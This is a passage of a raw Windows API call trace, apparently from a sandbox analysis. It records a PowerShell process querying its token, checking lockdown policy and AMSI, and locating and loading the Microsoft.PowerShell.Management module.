csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x2386d704320 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0199.192] CoTaskMemFree (pv=0x2386d704320) [0199.192] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0xafa508dc00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0199.192] GetCurrentProcess () returned 0xffffffffffffffff [0199.192] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xafa508e0b8 | out: TokenHandle=0xafa508e0b8*=0x724) returned 1 [0199.193] GetTokenInformation (in: TokenHandle=0x724, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xafa508e1b8 | out: TokenInformation=0x0, ReturnLength=0xafa508e1b8) returned 0 [0199.193] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x2386d6fc470 [0199.193] GetTokenInformation (in: TokenHandle=0x724, TokenInformationClass=0x1, TokenInformation=0x2386d6fc470, TokenInformationLength=0x2c, ReturnLength=0xafa508e1b8 | out: TokenInformation=0x2386d6fc470, ReturnLength=0xafa508e1b8) returned 1 [0199.193] LocalFree (hMem=0x2386d6fc470) returned 0x0 [0199.193] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x23800857838, cbSid=0xafa508e1b0 | out: pSid=0x23800857838*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0xafa508e1b0) returned 1 [0199.193] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0xafa508e050*=0x7f8, lpdwindex=0xafa508de24 | out: lpdwindex=0xafa508de24) returned 0x0 [0199.194] CoTaskMemAlloc (cb=0x20e) returned 0x2386d706fc0 [0199.194] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x2386d706fc0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0199.194] CoTaskMemFree (pv=0x2386d706fc0) [0199.194] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xafa508dd10, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0199.197] CoCreateGuid (in: pguid=0xafa508e268 | out: pguid=0xafa508e268*(Data1=0xda41ac9f, Data2=0x3144, Data3=0x4b8a, Data4=([0]=0x83, [1]=0x5c, [2]=0xce, [3]=0x7f, [4]=0x21, [5]=0xa7, [6]=0x6e, [7]=0xbf))) returned 0x0 [0199.197] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x728 [0199.197] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x714 [0199.197] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x888 [0199.197] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3b8 [0199.197] SetEvent (hEvent=0x3b8) returned 1 [0199.197] SetEvent (hEvent=0x728) returned 1 [0199.197] SetEvent (hEvent=0x714) returned 1 [0199.197] SetEvent (hEvent=0x888) returned 1 [0199.198] AmsiCloseSession () returned 0x7ff865db8068 [0199.198] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3bc [0199.198] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.200] EtwEventActivityIdControl () returned 0x0 [0199.200] EtwEventActivityIdControl () returned 0x0 [0199.200] EtwEventActivityIdControl () returned 0x0 [0199.210] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0199.211] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xafa508d510, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0199.211] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508da40 | out: lpFileInformation=0xafa508da40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1 [0199.211] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0199.211] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xafa508d070, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0199.211] CoTaskMemAlloc (cb=0x20c) returned 0x2386d7080c0 [0199.211] GetSystemDirectoryW (in: lpBuffer=0x2386d7080c0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0199.211] CoTaskMemFree (pv=0x2386d7080c0) [0199.211] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xafa508cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0199.212] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xafa508d470 | out: lpFileInformation=0xafa508d470*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0199.212] WldpGetLockdownPolicy () returned 0x0 [0199.212] GetSystemInfo (in: lpSystemInfo=0xafa508d4d0 | out: lpSystemInfo=0xafa508d4d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0199.212] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508d3d8 | out: phkResult=0xafa508d3d8*=0x83c) returned 0x0 [0199.212] RegQueryValueExW (in: hKey=0x83c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xafa508d428, lpData=0x0, lpcbData=0xafa508d420*=0x0 | out: lpType=0xafa508d428*=0x0, lpData=0x0, lpcbData=0xafa508d420*=0x0) returned 0x2 [0199.212] RegCloseKey (hKey=0x83c) returned 0x0 [0199.213] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xafa508cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0199.213] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x83c [0199.213] GetFileType (hFile=0x83c) returned 0x1 [0199.213] GetFileType (hFile=0x83c) returned 0x1 [0199.213] SetFilePointer (in: hFile=0x83c, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508d258*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508d258*=0) returned 0x0 [0199.213] ReadFile (in: hFile=0x83c, lpBuffer=0x2380087b200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508d2d8, lpOverlapped=0x0 | out: lpBuffer=0x2380087b200*, lpNumberOfBytesRead=0xafa508d2d8*=0x955, lpOverlapped=0x0) returned 1 [0199.215] SetFilePointer (in: hFile=0x83c, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508d258*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508d258*=0) returned 0x955 [0199.215] ReadFile (in: hFile=0x83c, lpBuffer=0x2380087a6bd, nNumberOfBytesToRead=0x2ab, lpNumberOfBytesRead=0xafa508d2d8, lpOverlapped=0x0 | out: lpBuffer=0x2380087a6bd*, lpNumberOfBytesRead=0xafa508d2d8*=0x0, lpOverlapped=0x0) returned 1 [0199.216] SetFilePointer (in: hFile=0x83c, lDistanceToMove=0, lpDistanceToMoveHigh=0xafa508d258*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xafa508d258*=0) returned 0x955 [0199.216] ReadFile (in: hFile=0x83c, lpBuffer=0x2380087b200, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xafa508d2d8, lpOverlapped=0x0 | out: lpBuffer=0x2380087b200*, lpNumberOfBytesRead=0xafa508d2d8*=0x0, lpOverlapped=0x0) returned 1 [0199.216] CoTaskMemAlloc (cb=0x20c) returned 0x2386d7060e0 [0199.216] GetSystemDirectoryW (in: lpBuffer=0x2386d7060e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0199.216] CoTaskMemFree (pv=0x2386d7060e0) [0199.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xafa508cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0199.216] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0xafa508d2d0 | out: lpFileInformation=0xafa508d2d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0199.216] WldpGetLockdownPolicy () returned 0x0 [0199.216] GetSystemInfo (in: lpSystemInfo=0xafa508d330 | out: lpSystemInfo=0xafa508d330*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0199.217] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508d238 | out: phkResult=0xafa508d238*=0x88c) returned 0x0 [0199.217] RegQueryValueExW (in: hKey=0x88c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xafa508d288, lpData=0x0, lpcbData=0xafa508d280*=0x0 | out: lpType=0xafa508d288*=0x0, lpData=0x0, lpcbData=0xafa508d280*=0x0) returned 0x2 [0199.217] RegCloseKey (hKey=0x88c) returned 0x0 [0199.217] CloseHandle (hObject=0x83c) returned 1 [0199.218] CoCreateGuid (in: pguid=0xafa508d3e8 | out: pguid=0xafa508d3e8*(Data1=0x44bdbde3, Data2=0x4e9d, Data3=0x4502, Data4=([0]=0xb7, [1]=0x35, [2]=0x4c, [3]=0x8, [4]=0xb, [5]=0x60, [6]=0xa, [7]=0x44))) returned 0x0 [0199.218] AmsiOpenSession () returned 0x0 [0199.218] AmsiScanString () returned 0x80070015 [0199.484] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en-US\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en-us\\microsoft.powershell.management.psd1")) returned 0xffffffff [0199.484] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\en\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\en\\microsoft.powershell.management.psd1")) returned 0xffffffff [0199.484] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xafa508bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0199.485] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x105, lpBuffer=0xafa508bf70, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0199.493] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", nBufferLength=0x105, lpBuffer=0xafa508bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x66 [0199.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c400) returned 1 [0199.493] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0xafa508c4e0 | out: lpFileInformation=0xafa508c4e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0199.493] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508c3c0) returned 1 [0199.493] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0199.493] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Commands.Management.dll\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.commands.management.dll\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0199.493] CoTaskMemAlloc (cb=0x20e) returned 0x2386d7080c0 [0199.493] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2386d7080c0, nSize=0x105 | out: lpBuffer="") returned 0x97 [0199.493] CoTaskMemFree (pv=0x2386d7080c0) [0199.493] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xafa508bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x39 [0199.494] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c1c0) returned 1 [0199.494] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xafa508c2a0 | out: lpFileInformation=0xafa508c2a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0199.494] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508c180) returned 1 [0199.499] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\windowspowershell\\modules")) returned 0xffffffff [0199.521] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0xafa508bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a [0199.521] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c1c0) returned 1 [0199.522] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0xafa508c2a0 | out: lpFileInformation=0xafa508c2a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0199.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508c180) returned 1 [0199.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0xafa508bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0199.522] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c1c0) returned 1 [0199.522] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0xafa508c2a0 | out: lpFileInformation=0xafa508c2a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1 [0199.522] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508c180) returned 1 [0199.522] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x105, lpBuffer=0xafa508bbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x53 [0199.523] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c020) returned 1 [0199.523] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0xafa508c100 | out: lpFileInformation=0xafa508c100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0199.523] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508bfe0) returned 1 [0199.525] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0199.525] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", nBufferLength=0x105, lpBuffer=0xafa508bbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management", lpFilePart=0x0) returned 0x5b [0199.525] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508c020) returned 1 [0199.525] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management"), fInfoLevelId=0x0, lpFileInformation=0xafa508c100 | out: lpFileInformation=0xafa508c100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0199.525] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508bfe0) returned 1 [0199.528] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Management\\Microsoft.PowerShell.Commands.Management.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.management\\microsoft.powershell.commands.management.dll")) returned 0xffffffff [0199.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xafa508bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f [0199.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xafa508ba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f [0199.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xafa508b7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x9f [0200.133] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508dac8 | out: phkResult=0xafa508dac8*=0x7f8) returned 0x0 [0200.133] RegQueryValueExW (in: hKey=0x7f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508db18, lpData=0x0, lpcbData=0xafa508db10*=0x0 | out: lpType=0xafa508db18*=0x1, lpData=0x0, lpcbData=0xafa508db10*=0x56) returned 0x0 [0200.134] RegQueryValueExW (in: hKey=0x7f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508db18, lpData=0x23800719c70, lpcbData=0xafa508db10*=0x56 | out: lpType=0xafa508db18*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508db10*=0x56) returned 0x0 [0200.134] RegCloseKey (hKey=0x7f8) returned 0x0 [0200.134] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508dac8 | out: phkResult=0xafa508dac8*=0x7f8) returned 0x0 [0200.134] RegQueryValueExW (in: hKey=0x7f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508db18, lpData=0x0, lpcbData=0xafa508db10*=0x0 | out: lpType=0xafa508db18*=0x1, lpData=0x0, lpcbData=0xafa508db10*=0x56) returned 0x0 [0200.134] RegQueryValueExW (in: hKey=0x7f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508db18, lpData=0x2380071a018, lpcbData=0xafa508db10*=0x56 | out: lpType=0xafa508db18*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508db10*=0x56) returned 0x0 [0200.134] RegCloseKey (hKey=0x7f8) returned 0x0 [0200.135] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xafa508dac8 | out: phkResult=0xafa508dac8*=0x7f8) returned 0x0 [0200.135] RegQueryValueExW (in: hKey=0x7f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508db18, lpData=0x0, lpcbData=0xafa508db10*=0x0 | out: lpType=0xafa508db18*=0x1, lpData=0x0, lpcbData=0xafa508db10*=0x56) returned 0x0 [0200.135] RegQueryValueExW (in: hKey=0x7f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xafa508db18, lpData=0x2380071a398, lpcbData=0xafa508db10*=0x56 | out: lpType=0xafa508db18*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xafa508db10*=0x56) returned 0x0 [0200.135] RegCloseKey (hKey=0x7f8) returned 0x0 [0200.135] RegOpenKeyExW (in: hKey=0xffffffff80000002, 